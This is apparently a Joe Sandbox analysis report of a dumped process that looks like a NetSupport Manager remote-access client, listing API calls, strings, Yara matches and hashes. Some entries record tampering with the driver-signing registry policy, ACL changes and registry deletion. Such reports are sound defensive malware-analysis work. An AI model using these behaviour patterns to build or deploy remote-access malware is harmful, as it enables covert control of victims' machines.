                                                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 005CAE9D
                                                                                          • ReleaseDC.USER32(?,00000000), ref: 005CAEA7
                                                                                            • Part of subcall function 005C2030: LoadLibraryW.KERNEL32(User32.dll,00000000,005CAE2C), ref: 005C2038
                                                                                          Similarity
                                                                                          • API ID: AddressLibraryProc$CapsDeviceErrorFreeLastLoadOpenReleaseVersion
                                                                                          • String ID: GetDpiForSystem$GetDpiForWindow
                                                                                          APIs
                                                                                          • GetStockObject.GDI32(0000000D), ref: 005CC104
                                                                                          • GetObjectW.GDI32(00000000,0000005C,?), ref: 005CC116
                                                                                          • CreateFontIndirectW.GDI32(?), ref: 005CC208
                                                                                          Strings
                                                                                          • ..\CTL32\util.cpp, xrefs: 005CC21C
                                                                                          • IsA(), xrefs: 005CC1C6
                                                                                          • e:\nsmsrc\nsm\1410\1410\ctl32\NSMString.h, xrefs: 005CC1C1
                                                                                          • hSubstitutedFont, xrefs: 005CC221
                                                                                          • Software\Microsoft\Windows NT\CurrentVersion\FontSubstitutes, xrefs: 005CC195
                                                                                          • MS Shell Dlg, xrefs: 005CC16F
                                                                                          Similarity
                                                                                          • API ID: Object$CreateFontIndirectStock
                                                                                          • String ID: ..\CTL32\util.cpp$IsA()$MS Shell Dlg$Software\Microsoft\Windows NT\CurrentVersion\FontSubstitutes$e:\nsmsrc\nsm\1410\1410\ctl32\NSMString.h$hSubstitutedFont
                                                                                          APIs
                                                                                          • EnterCriticalSection.KERNEL32(?,DE64E134), ref: 0059805D
                                                                                          • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,?), ref: 005980E5
                                                                                          • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,00000000,00000000), ref: 00598154
                                                                                          • RegDeleteValueW.ADVAPI32(?,?), ref: 00598168
                                                                                          • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,00000000,00000000), ref: 00598196
                                                                                          • LeaveCriticalSection.KERNEL32(?,?), ref: 0059819D
                                                                                          Similarity
                                                                                          • API ID: Value$CriticalEnumSection$DeleteEnterInfoLeaveQuery
                                                                                          • String ID: ..\CTL32\Config.cpp$err == 0$maxname < _tsizeof (keybuf)
                                                                                          • API String ID: 3037067311-2757561423
                                                                                          • Opcode ID: c6beb4c796f54148a810344ce2e775ecf611f5f610b13ef909768b53cbf622e0
                                                                                          • Instruction ID: 8ce01294830b2104e49b7c4cfcf151d1ab90748d890c23f68ef6f6205933d2eb
                                                                                          • Opcode Fuzzy Hash: c6beb4c796f54148a810344ce2e775ecf611f5f610b13ef909768b53cbf622e0
                                                                                          • Instruction Fuzzy Hash: A0418571A80219AFDB14CF54DC49FE5FBB8FB59B00F044159F519A7280DB706945CFA1
                                                                                          APIs
                                                                                          • Sleep.KERNEL32(000003E8), ref: 005DE852
                                                                                          • PostMessageW.USER32(?,000003E1,?,00000000), ref: 005DEDE1
                                                                                          • DestroyWindow.USER32(?), ref: 005DEDEE
                                                                                          • Sleep.KERNEL32(000003E8), ref: 005DEE58
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Sleep$DestroyMessagePostWindow
                                                                                          • String ID: Done:$Exit$OK$Restart$winexec.ok
                                                                                          • API String ID: 2870736975-2848714714
                                                                                          • Opcode ID: 0ad97b93345c077d87a6b55fed3467e8e79f8c3149ca9bde1d1c649861857d5f
                                                                                          • Instruction ID: a1898b087c2cd4d06e3dc25103b319b74772662a63ede1714211e5ac9e81aedb
                                                                                          • Opcode Fuzzy Hash: 0ad97b93345c077d87a6b55fed3467e8e79f8c3149ca9bde1d1c649861857d5f
                                                                                          • Instruction Fuzzy Hash: A1316C76D4111197CB307B6CAC9BF6D3EA6BB81310F094667F4869B3D1EA704D818BA2
                                                                                          APIs
                                                                                          • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Driver Signing,00000000,000F003F,?,00000000,?,00000000,?,005BE88D,?,0059A1B1,?), ref: 005BE583
                                                                                          • RegQueryValueExW.ADVAPI32(?,Policy,00000000,?,?,?,?,005BE88D,?,0059A1B1,?), ref: 005BE5B1
                                                                                          • RegSetValueExW.ADVAPI32(00000000,Policy,00000000,00000004,005BE88D,00000004,?,Policy,00000000,?,?,?), ref: 005BE5DF
                                                                                          • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Driver Signing,00000000,000F003F,?,?,005BE88D,?,0059A1B1,?), ref: 005BE607
                                                                                          • RegQueryValueExW.ADVAPI32(?,Policy,00000000,?,?,?,?,005BE88D,?,0059A1B1,?), ref: 005BE638
                                                                                          • RegSetValueExW.ADVAPI32(?,Policy,00000000,00000003,005BE88D,00000000), ref: 005BE66C
                                                                                          • Sleep.KERNEL32(000003E8,?,005BE88D,?,0059A1B1,?), ref: 005BE693
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Value$OpenQuery$Sleep
                                                                                          • String ID: Policy$Software\Microsoft\Driver Signing
                                                                                          • API String ID: 3131223082-3913124361
                                                                                          • Opcode ID: c9eff40889c055404c797736bc24c8afcaf1c2ac04976a60492a3d9b630d35ff
                                                                                          • Instruction ID: cb1828bddf09204a53b879d4a15f69ae60f5c4eda01b0bd76d4b4df78a0a206c
                                                                                          • Opcode Fuzzy Hash: c9eff40889c055404c797736bc24c8afcaf1c2ac04976a60492a3d9b630d35ff
                                                                                          • Instruction Fuzzy Hash: 38316EB1A40304AFDB308F65DC86FEABBB9FB29B05F14441EF61996180E7B46944CB61
                                                                                          APIs
                                                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 005E2369
                                                                                          • AddAce.ADVAPI32(00000000,00000002,000000FF,00000000,?), ref: 005E2393
                                                                                          • AddAuditAccessAce.ADVAPI32(00000000,00000002,?,?,?,?), ref: 005E23B8
                                                                                          • GetLastError.KERNEL32(?,00000002,?,?,?,?,?,00000002,000000FF,00000000,?), ref: 005E23C2
                                                                                          • GetProcAddress.KERNEL32(00000104,SetNamedSecurityInfoW), ref: 005E23E1
                                                                                          • LocalFree.KERNEL32(?,?,?,00000001), ref: 005E2435
                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000001), ref: 005E2442
                                                                                          • HeapFree.KERNEL32(00000000), ref: 005E2449
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FreeHeap$AccessAddressAuditErrorLastLocalProcProcess
                                                                                          • String ID: SetNamedSecurityInfoW
                                                                                          • API String ID: 4281476915-3189892758
                                                                                          • Opcode ID: fd25e0a0b2ff458ee17c207001a8c8ec14bbbb14d6dddd6a9e6e4f786dd4a314
                                                                                          • Instruction ID: ca0a2a176ac2aa489833777b07aa598e68d1d7041bd58cbc55eaef42a0a8fa05
                                                                                          • Opcode Fuzzy Hash: fd25e0a0b2ff458ee17c207001a8c8ec14bbbb14d6dddd6a9e6e4f786dd4a314
                                                                                          • Instruction Fuzzy Hash: 873152B1A002199FDB24CF55DC99FEAB7B9FB48701F048189FA49A7280D7709D418FA0
                                                                                          APIs
                                                                                            • Part of subcall function 005C92B0: GetVersionExW.KERNEL32(0063BEF0,00000000), ref: 005C92E0
                                                                                            • Part of subcall function 005C92B0: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 005C931F
                                                                                          • LoadLibraryW.KERNEL32(secur32.dll,DE64E134), ref: 005CC931
                                                                                          • GetProcAddress.KERNEL32(00000000,GetUserNameExW), ref: 005CC949
                                                                                          • timeGetTime.WINMM ref: 005CC95C
                                                                                          • timeGetTime.WINMM(?,?), ref: 005CC973
                                                                                          • GetLastError.KERNEL32(?,?), ref: 005CC979
                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 005CC99B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: LibraryTimetime$AddressErrorFreeLastLoadOpenProcVersion
                                                                                          • String ID: GetUserNameEx ret %d, %s, time=%d ms, e=%d$GetUserNameExW$secur32.dll
                                                                                          • API String ID: 1482422562-3336919047
                                                                                          • Opcode ID: 59ecd8565e7ba10bde08cde06382e994c2919085f52da4ac682e3ccf5b2ecd05
                                                                                          • Instruction ID: 8d34cabc213d0ba73cddcee0846889b4c7eb73943efc638f970efa0d33200ace
                                                                                          • Opcode Fuzzy Hash: 59ecd8565e7ba10bde08cde06382e994c2919085f52da4ac682e3ccf5b2ecd05
                                                                                          • Instruction Fuzzy Hash: 55213D71D04616AFDB109FA8DD49FABBFB9EB49B14F05452AFC05E7280E77099008BE1
                                                                                          APIs
                                                                                          • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,7#Y,?), ref: 005986C6
                                                                                          • RegEnumValueW.ADVAPI32(?,?,?,?,00000000,?,?,?,00000000,7#Y,?), ref: 0059874D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: EnumInfoQueryValue
                                                                                          • String ID: ..\CTL32\Config.cpp$7#Y$_tcslen (k.m_k) < _tsizeof (m_szSectionAndKey)$err == 0$maxname < _tsizeof (m_szSectionAndKey)
                                                                                          • API String ID: 918324718-2149373132
                                                                                          • Opcode ID: de47fd093281daacdb3d4e34d1c6301e8dde4cf9bca258e2509055ddef3b7e50
                                                                                          • Instruction ID: 2ef4f34162ab11fcda3d0d9c3b347998f0b5d16d3bd24f7bc4e2068b99b2aee4
                                                                                          • Opcode Fuzzy Hash: de47fd093281daacdb3d4e34d1c6301e8dde4cf9bca258e2509055ddef3b7e50
                                                                                          • Instruction Fuzzy Hash: 4F91BF71A00701AFDB20CF65C885BA7BBF5BF89304F14495CE88697681EB70EA44CB61
                                                                                          APIs
                                                                                          • EnterCriticalSection.KERNEL32(?,DE64E134), ref: 0059CD82
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0059CDA2
                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 0059CE7C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$CurrentEnterLeaveThread
                                                                                          • String ID: ..\CTL32\EVMNGR.cpp$bFound
                                                                                          • API String ID: 2351996187-1229222698
                                                                                          • Opcode ID: a7a036e17f3a238c77098a6eff206d73fd3e0c9ec31014dc2e6d36330151d348
                                                                                          • Instruction ID: 2b626ddc1b3363ce7340b219513b07bc72d9d81761e17b9f21eb51e6302a1c4e
                                                                                          • Opcode Fuzzy Hash: a7a036e17f3a238c77098a6eff206d73fd3e0c9ec31014dc2e6d36330151d348
                                                                                          • Instruction Fuzzy Hash: 3F515C71A042849FDF16CF68C484FAABFE9FF49310F598559E8169B292D731ED40CB90
                                                                                          APIs
                                                                                          • wsprintfW.USER32 ref: 005D4EC2
                                                                                          • RegSetValueExW.ADVAPI32(?,?,00000000,?,?,?), ref: 005D4F50
                                                                                            • Part of subcall function 005DF030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 005DF04D
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF09D
                                                                                            • Part of subcall function 005DF030: wvsprintfW.USER32(?,?,00000000), ref: 005DF0BE
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF0D3
                                                                                          • RegEnumValueW.ADVAPI32(?,?,?,?,00000000,?,?,?), ref: 005D4FFF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: wsprintf$Value$EnumLocalTimewvsprintf
                                                                                          • String ID: "$%s exists$%s=%s, err=%d$Found %s$\%s
                                                                                          • API String ID: 2854092196-3597523911
                                                                                          • Opcode ID: cced1575da90b2e46880cc7e6f8e554d639ed411e4ef0bc2abd785d5d0fa14a0
                                                                                          • Instruction ID: 5412f28b5f404b2fadc0891577c5d411c65d648300c2708c27053ea52d7ea75d
                                                                                          • Opcode Fuzzy Hash: cced1575da90b2e46880cc7e6f8e554d639ed411e4ef0bc2abd785d5d0fa14a0
                                                                                          • Instruction Fuzzy Hash: 3251A17690112A9BDF24DB58CC85EEE77B9FF94300F048596F509A3250EF705A488FA1
                                                                                          APIs
                                                                                            • Part of subcall function 005DF030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 005DF04D
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF09D
                                                                                            • Part of subcall function 005DF030: wvsprintfW.USER32(?,?,00000000), ref: 005DF0BE
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF0D3
                                                                                          • RegCreateKeyW.ADVAPI32(80000002,?,?), ref: 005D2683
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: wsprintf$CreateLocalTimewvsprintf
                                                                                          • String ID: EventMessageFile$RegisterEventLog(%s)$TypesSupported
                                                                                          • API String ID: 1283108071-324002705
                                                                                          • Opcode ID: e9e268d5be2ff1709867e53eae31ab8ce1c5440f2d499cc5ec0082ef625ee1d7
                                                                                          • Instruction ID: c7912593194efeb612443e765e977d310f36362108e58490bbae237908daa717
                                                                                          • Opcode Fuzzy Hash: e9e268d5be2ff1709867e53eae31ab8ce1c5440f2d499cc5ec0082ef625ee1d7
                                                                                          • Instruction Fuzzy Hash: 6641C971A042199BCB24AF68DC1ABFB77B9EF54710F044596F90AD7291EA709E40CB90
                                                                                          APIs
                                                                                          • RegEnumKeyExW.ADVAPI32(?,?,?,?,00000000,00000000,00000000,?), ref: 00594113
                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 00594145
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 005941A3
                                                                                            • Part of subcall function 005C37C0: RegQueryValueExW.ADVAPI32(00000000,?,?,00000000,00000000,00000000,?,00000000,752F55F0,?,005C9375,00000000,CSDVersion,00000000,00000000,?), ref: 005C37E0
                                                                                          Similarity
                                                                                          • API ID: CloseEnumOpenQueryValue
                                                                                          • String ID: (idata->flags & CFG_VOLATILE) == 0$..\CTL32\Config.cpp$CurrConfig$General\ProductID$nssCurrConfig
                                                                                          • API String ID: 3984146545-3838709216
                                                                                          • Opcode ID: 5b5b1461f86581f0083b2b6dbd9911e668fb008d40163a6c9e24632b6b9c4114
                                                                                          • Instruction ID: 7516e2e609cc7da9e282855aa7610f95ca60dcb3d09a3023640de483f4ff98d6
                                                                                          • Opcode Fuzzy Hash: 5b5b1461f86581f0083b2b6dbd9911e668fb008d40163a6c9e24632b6b9c4114
                                                                                          • Instruction Fuzzy Hash: C0417472A00319AFDB20DB64DC45FEA77B9AB89700F04859DF64DD7241DA70AA44CFA1
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: "$NSMFileExists(%s) took %d ms$client32u.ini
                                                                                          • API String ID: 0-1321718478
                                                                                          • Opcode ID: 6e9cd5ae2f14853b799be48bf09844d8742770c55caafc6d3cb7f069939ca4fa
                                                                                          • Instruction ID: d22e58b81e3318ae44d85ac34932e4d625bffe30fafe3070cf95ade4a03941cc
                                                                                          • Opcode Fuzzy Hash: 6e9cd5ae2f14853b799be48bf09844d8742770c55caafc6d3cb7f069939ca4fa
                                                                                          • Instruction Fuzzy Hash: 1E4107329002189FCB20DFA8DC5AFEA77B5FB44314F1486A9F91A9B1D1E7B05E44CB90
                                                                                          APIs
                                                                                            • Part of subcall function 005DF030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 005DF04D
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF09D
                                                                                            • Part of subcall function 005DF030: wvsprintfW.USER32(?,?,00000000), ref: 005DF0BE
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF0D3
                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,000F003F,?), ref: 005DAD9A
                                                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 005DADDE
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 005DAE79
                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 005DAE81
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 005DAEB6
                                                                                            • Part of subcall function 005DAD60: RegCloseKey.ADVAPI32(?), ref: 005DAE25
                                                                                            • Part of subcall function 005DAD60: RegOpenKeyExW.ADVAPI32(?,?,00000000,000F003F,?), ref: 005DAE3B
                                                                                          Strings
                                                                                          • Delete registry entries for %s, xrefs: 005DAD7D
                                                                                          Similarity
                                                                                          • API ID: Close$Openwsprintf$DeleteEnumLocalTimewvsprintf
                                                                                          • String ID: Delete registry entries for %s
                                                                                          • API String ID: 1838657294-4139843425
                                                                                          • Opcode ID: c0946fb0307c352789c8fb98160639e56829b947ebe6ae83070bd029046c6f0d
                                                                                          • Instruction ID: e923b67d182b904a7a37ce7c05292bcd78a67b7d336a450f6582cb964e4f7021
                                                                                          • Opcode Fuzzy Hash: c0946fb0307c352789c8fb98160639e56829b947ebe6ae83070bd029046c6f0d
                                                                                          • Instruction Fuzzy Hash: CC31EB35E0021867CB30DB69DC49FEB7BBDEB98711F04409AFA4997241DA709D84CBA1
                                                                                          APIs
                                                                                          • GetVersionExW.KERNEL32(?), ref: 0059E179
                                                                                          • GetTickCount.KERNEL32 ref: 0059E1AA
                                                                                          • GetDC.USER32(00000000), ref: 0059E1B1
                                                                                          • ReleaseDC.USER32(00000000,?), ref: 0059E28C
                                                                                          • GetTickCount.KERNEL32 ref: 0059E292
                                                                                          • GetSystemMetrics.USER32(00000000), ref: 0059E2A3
                                                                                          • GetSystemMetrics.USER32(00000001), ref: 0059E2B1
                                                                                          Similarity
                                                                                          • API ID: CountMetricsSystemTick$ReleaseVersion
                                                                                          • String ID: PCI GDIHOOK5
                                                                                          • API String ID: 1620108203-3323809677
                                                                                          • Opcode ID: 26588eebfaa7439479a0b0a3559dfab0b44ba94ba08255b53a6de03263d2313e
                                                                                          • Instruction ID: 4a52bae7a87b978580357e81e4e9549de3cd08b7a6965c86b4d4bb4dcc3aa7f5
                                                                                          • Opcode Fuzzy Hash: 26588eebfaa7439479a0b0a3559dfab0b44ba94ba08255b53a6de03263d2313e
                                                                                          • Instruction Fuzzy Hash: 6141B2B59003089FCF28DF65CD8AAEABBFDFF85305F0484ADE60A96141D6316A45CF61
                                                                                          Strings
                                                                                          • Callstack:, xrefs: 005CA1E0
                                                                                          • %02X , xrefs: 005CA1C3
                                                                                          • EAX=%08X EBX=%08X ECX=%08X EDX=%08X ESI=%08XEDI=%08X EBP=%08X ESP=%08X EIP=%08X FLG=%08XCS=%04X DS=%04X SS=%04X ES=%0, xrefs: 005CA17D
                                                                                          Similarity
                                                                                          • API ID: wsprintf$CurrentReadThread
                                                                                          • String ID: Callstack:$%02X $EAX=%08X EBX=%08X ECX=%08X EDX=%08X ESI=%08XEDI=%08X EBP=%08X ESP=%08X EIP=%08X FLG=%08XCS=%04X DS=%04X SS=%04X ES=%0
                                                                                          • API String ID: 477357799-1804337886
                                                                                          • Opcode ID: 0739e0cf0cbd132d6178898b8c08a57b426b80fe3094027067b2265f60e45506
                                                                                          • Instruction ID: d6d67690817a94ad1690d7c299b1dd82195634795fcfc83650a8cacf557daa8a
                                                                                          • Opcode Fuzzy Hash: 0739e0cf0cbd132d6178898b8c08a57b426b80fe3094027067b2265f60e45506
                                                                                          • Instruction Fuzzy Hash: 684120B6300606BFDB44CFA8DC94F96BBAABB88744F048218F91DC7255D730A914CBE1
                                                                                          APIs
                                                                                          • LoadLibraryW.KERNEL32(?), ref: 005C46C6
                                                                                          • GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 005C46D8
                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 005C4714
                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 005C4731
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Library$Free$AddressLoadProc
                                                                                          • String ID: ..\CTL32\util.cpp$DllGetVersion$pdwMajorVer$pdwMinorVer
                                                                                          • API String ID: 1386263645-850731426
                                                                                          • Opcode ID: 97fe1fe15c3bcc8634ee8bb03d0a91d63371a42d2bfa1195c88492ae793ab311
                                                                                          • Instruction ID: 797b73cd43bf2128e62808b94ed74525b0cbba34e2138d2472b9d2d775e8a648
                                                                                          • Opcode Fuzzy Hash: 97fe1fe15c3bcc8634ee8bb03d0a91d63371a42d2bfa1195c88492ae793ab311
                                                                                          • Instruction Fuzzy Hash: 6B318071E0420A9BCB049FA9E855BEEFBF5FF88715F14406EE909A3381DB7059008BD1
                                                                                          APIs
                                                                                            • Part of subcall function 005DF030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 005DF04D
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF09D
                                                                                            • Part of subcall function 005DF030: wvsprintfW.USER32(?,?,00000000), ref: 005DF0BE
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF0D3
                                                                                          • PostMessageW.USER32(?,000003E1,?,00000000), ref: 005DEDE1
                                                                                          • DestroyWindow.USER32(?), ref: 005DEDEE
                                                                                          • Sleep.KERNEL32(000003E8), ref: 005DEE58
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: wsprintf$DestroyLocalMessagePostSleepTimeWindowwvsprintf
                                                                                          • String ID: Done:$Exit$OK$Restart$winexec.ok
                                                                                          • API String ID: 2273097643-2848714714
                                                                                          • Opcode ID: d7cbb7f2aaaf2246845a7e99de61c883f9da133cf5c15109bf940601236f32a2
                                                                                          • Instruction ID: abe49c41dee229a203cae5271667180ffb3d867748ff70b8902a264d254e371b
                                                                                          • Opcode Fuzzy Hash: d7cbb7f2aaaf2246845a7e99de61c883f9da133cf5c15109bf940601236f32a2
                                                                                          • Instruction Fuzzy Hash: 64112C75E405159BCB30BB68BC9BE6E3B66FB41305B084437F4479A342EA715980CBF2
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32 ref: 005CA600
                                                                                          • wsprintfW.USER32 ref: 005CA61A
                                                                                          • OutputDebugStringW.KERNEL32(?), ref: 005CA630
                                                                                            • Part of subcall function 005C55B0: GetTickCount.KERNEL32 ref: 005C5618
                                                                                            • Part of subcall function 005CA0F0: GetCurrentThreadId.KERNEL32 ref: 005CA103
